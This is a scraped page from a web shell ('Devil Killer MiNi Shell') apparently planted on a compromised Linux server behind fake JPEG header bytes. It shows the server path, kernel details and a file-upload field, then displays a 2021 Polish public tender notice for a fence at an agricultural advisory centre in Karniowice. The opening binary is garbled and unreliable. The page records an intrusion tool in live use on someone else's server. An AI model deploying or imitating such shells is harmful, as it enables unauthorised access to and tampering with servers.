JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211013/0023176002-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie ogrodzenia wokół budynku Małopolskiego Ośrodka Doradztwa Rolniczego w Karniowicach, przy ul. Osiedlowej 9, dz. 109/176, ob. Karniowice, gm. Zabierzów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MAŁOPOLSKI OŚRODEK DORADZTWA ROLNICZEGO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 356900630</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Osiedlowa 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Karniowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-082</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL21A - Oświęcimski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 285 21 13</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@modr.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.modr.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Doradztwo rolnicze </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie ogrodzenia wokół budynku Małopolskiego Ośrodka Doradztwa Rolniczego w Karniowicach, przy ul. Osiedlowej 9, dz. 109/176, ob. Karniowice, gm. Zabierzów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-07d1d3a3-2c20-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00231760</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00016051/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Wykonanie ogrodzenia wokół budynku Małopolskiego Ośrodka Doradztwa Rolniczego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://modr.pl/przetargi <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl oraz<br/>ePUAPu https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji<br/>oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, odbywa się<br/>przy użyciu środków komunikacji elektronicznej, za pośrednictwem miniPortalu<br/>https://miniportal.uzp.gov.pl/<br/>oraz ePUAPu https://epuap.gov.pl/wps/portal<br/>2. Oferty wraz z załącznikami sporządza się pod rygorem nieważności w formie elektronicznej,<br/>opatrzone kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej, opatrzone podpisem<br/>zaufanym lub podpisem osobistym.<br/>3. Zamawiający dopuszcza również komunikację za pomocą poczty elektronicznej, email:<br/>sekretariat@modr.pl, z zastrzeżeniem Rozdziału IX ust. 2 SWZ, tj. składania ofert wraz z załącznikami.<br/>Korespondencja kierowana do zamawiającego powinna być opatrzona numerem postępowania<br/>MODR/PN/2021/4 lub nazwą zamówienia.<br/>4. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularza<br/>złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>5. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej<br/>przekazywanej przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu oraz<br/>Regulaminie ePUAP.<br/>6. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego,<br/>akceptuje warunki korzystania z miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje<br/>się korzystając z miniPortalu przestrzegać tego regulaminu.<br/>7. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia,<br/>zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.<br/>8. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP.<br/>9. Zamawiający informuje, iż identyfikator postępowania dla niniejszego postępowania o udzielenie<br/>zamówienia jest dostępny na stronie postępowania oraz na Liście wszystkich postępowań<br/>naminiPortalu.<br/>10. Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym,<br/>który wynosi max 10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp<br/>służącej do składania podpisu osobistego, który wynosi max 5MB (rozmiar pojedynczego dokumentu<br/>po podpisaniu).<br/>11. Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu,<br/>zamawiający zaleca, w miarę możliwości, przekonwertowanie plików składających się na ofertę na<br/>format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES. Pliki w innych formatach niż PDF zaleca<br/>się opatrzyć zewnętrznym podpisem XAdES. Wykonawca powinien pamiętać, aby plik z podpisem<br/>przekazywać łącznie z dokumentem podpisywanym.<br/>12. Zamawiający zaleca, aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego<br/>samego rodzaju. Podpisywanie różnymi rodzajami podpisów np. osobistym i kwalifikowanym może<br/>doprowadzić do problemów w weryfikacji plików.<br/>13. Zamawiający zaleca, aby wykonawca z odpowiednim wyprzedzeniem przetestował możliwość<br/>prawidłowego wykorzystania wybranej metody podpisania plików oferty.<br/>14. Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do zamawiającego, uważa się<br/>za dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do zamawiającego przed upływem<br/>tego terminu. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przekazywanych na<br/>adres e-mail zamawiającego przyjmuje się datę dostarczenia wiadomości na adres e-mail<br/>zamawiającego.<br/>15. Zamawiający nie przewiduje sposobu komunikowania się z wykonawcami w inny sposób niż przy<br/>użyciu środków komunikacji elektronicznej, wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje dotyczące RODO (klauzule informacyjne z art.<br/>13 i art. 14 RODO) zostały opisane w sekcji XXII SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje dotyczące RODO (klauzule informacyjne z art.<br/>13 i art. 14 RODO) zostały opisane w sekcji XXII SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MODR/DAG/272/1/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest realizacja inwestycji pn. „Wykonanie ogrodzenia wokół<br/>budynku Małopolskiego Ośrodka Doradztwa Rolniczego w Karniowicach, przy ul. Osiedlowej 9,<br/>dz. 109/176, ob. Karniowice, gm. Zabierzów &#34;.<br/>2. Zakres robót budowlanych obejmuje:<br/>- wykonanie nowego ogrodzenia z podmurówką całego terenu Małopolskiego Ośrodka<br/>Doradztwa Rolniczego,<br/>- montaż szlabanu przy wjeździe na parking w północnej części działki,<br/>- realizacja kontroli dostępu przy szlabanie,<br/>- realizacja nowego pochwytu przy zewnętrznych schodach ogólnodostępnych.<br/>3. Szczegółowy opis przedmiotu zamówienia oraz zakres obowiązków wykonawcy zawarty jest<br/>w Projektowanych postanowieniach umowy, stanowiących zał. nr 1 do SWZ, a także w<br/>Dokumentacji projektowej, Specyfikacji Technicznej Wykonania i Odbioru Robót (STWiORB),<br/>stanowiących zał. nr 10 do SWZ oraz zał. nr 11 Opis przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45342000-6 - Wznoszenie ogrodzeń</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45314300-4 - Instalowanie infrastruktury okablowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">50 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Oferty będą oceniane wg następujących kryteriów:<br/>1) Kryterium ,,Cena” – będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu<br/>zamówienia podanej przez wykonawcę w Formularzu oferty;<br/>2) Kryterium ,,Okres gwarancji” – będzie rozpatrywane na podstawie<br/>wskazanej przez wykonawcę w Formularzu oferty liczby pełnych miesięcy okresu gwarancji.<br/>2. Szczegółowe informacje dot. sposobu oceny ofert zostały opisane w sekcji XV SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	Zdolność do występowania w obrocie gospodarczym – zamawiający nie wyznacza warunku w tym zakresie. <br/>2.	Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – zamawiający nie wyznacza warunku w tym zakresie. <br/>3.	Sytuacja ekonomiczna lub finansowa – zamawiający nie ustanawia warunku w tym zakresie. <br/>4.	Zdolność techniczna lub zawodowa – o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy posiadają niezbędną wiedzę i doświadczenie oraz wykażą, że: <br/>4.1	posiadają niezbędną wiedzę i doświadczenie, tj. w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie – wykonali co najmniej 2 zamówienia (2 odrębne kontrakty), obejmujące swoim zakresem roboty budowlane związane z wykonaniem ogrodzenia, każde o wartości nie mniejszej niż 30 000 zł brutto, <br/>4.2	dysponują osobami zdolnymi do realizacji przedmiotu zamówienia oraz skierują do jego realizacji : <br/>osobę, która będzie pełnić w takcie realizacji zamówienia funkcję kierownika budowy/kierownika robót - osoba legitymująca się uprawnieniami budowlanymi do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, wydanymi na podstawie przepisów ustawy z dnia 7 lipca 1994 Prawo budowlane lub aktualnymi uprawnieniami równoważnymi do powyższych (w szczególności wydanymi na podstawie wcześniej obowiązujących przepisów lub wydawanymi obywatelom innych państw w oparciu o stosowne ustawodawstwo, a uznanymi w Polsce); <br/>5.	Osoba wymieniona w pkt 4.2. winna posiadać stosowne uprawnienia budowlane odpowiednio do postawionego warunku i legitymować się zaświadczeniem o nadanych uprawnieniach – zgodnie z wymogami ustawy z dnia 7 lipca 1994 r. Prawo budowlane oraz rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie lub dokumentem równoważnym w przypadku osób, które takie uprawnienia uzyskały poza granicami Rzeczypospolitej Polskiej, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych lub mającymi prawo do świadczenia usług transgranicznych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5) ustawy PZP, o braku przynależności do<br/>tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>Ogłoszenie nr 2021/BZP 00156602/01 z dnia 2021-08-23<br/>2021-08-23 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>konsumentów, z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenie o przynależności<br/>do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie<br/>oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. W przypadku<br/>wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie, o którym mowa<br/>powyżej,składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia. Ww.<br/>oświadczenie zaleca się<br/>sporządzić według wzoru stanowiącego załącznik nr 6 do SWZ.<br/>2. Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) ustawy Pzp, sporządzonych nie wcześniej<br/>niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>3. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami RP, zamiast dokumentów,<br/>o których mowa w pkt 2 powyżej: 1) składa dokument lub dokumenty wystawione w kraju, w którym<br/>wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie<br/>ogłoszono upadłości, jego aktywami<br/>nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie<br/>jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury<br/>przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokumenty te winny być wystawione nie<br/>wcześniej niż 3 miesiące przed ich złożeniem.<br/>2) Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa powyżej w pkt 1), zastępuje się je dokumentem zawierającym<br/>odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób<br/>uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone<br/>pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma<br/>przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym,<br/>notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na<br/>siedzibę lub miejsce zamieszkania wykonawcy. Dokumenty te winny być wystawione nie wcześniej niż<br/>3 miesiące przed ich złożeniem.<br/>4. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, jeżeli<br/>zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w<br/>szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji<br/>działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskaże w oświadczeniu, o<br/>którym mowa w art. 125 ust. 1 ustawy Pzp, dane umożliwiające dostęp do tych środków.<br/>5. Zamawiający żąda od wykonawcy, który polega na zdolnościach podmiotów udostępniających<br/>zasoby na zasadach określonych w art. 118 ust. 1 ustawy Pzp, przedstawienia w odniesieniu do tych<br/>podmiotów dokumentów wymienionych w pkt 2 powyżej.<br/>6. Zamawiający żąda od wykonawców wspólnie ubiegających się o udzielenie zamówienia (np.<br/>członkowie konsorcjum, wspólnicy spółki cywilnej) przedstawienia w odniesieniu do każdego z<br/>wykonawców dokumentów wymienionych w pkt 2 powyżej.<br/>7. Ww. dokumenty wykonawca składa w odpowiedzi na wezwanie zamawiającego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem<br/>ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>Wykaz robót budowlanych zaleca się sporządzić według wzoru stanowiącego załącznik nr 7 do SWZ.<br/>UWAGA:<br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych<br/>wspólnie z innymi wykonawcami, wówczas w powyższym wykazie zobowiązany jest podać jedynie te<br/>roboty budowlane, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/>2. Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>Ogłoszenie nr 2021/BZP 00156602/01 z dnia 2021-08-23<br/>2021-08-23 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wykaz osób zaleca<br/>się sporządzić według wzoru stanowiącego załącznik nr 8 do SWZ.<br/>3. Ww. dokumenty wykonawca składa w odpowiedzi na wezwanie zamawiającego.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. W celu skutecznego złożenia oferty wykonawca zobowiązany jest złożyć:<br/>1.1. Formularz oferty, wypełniony i podpisany przez osoby upoważnione do reprezentowania<br/>wykonawcy, według wzoru 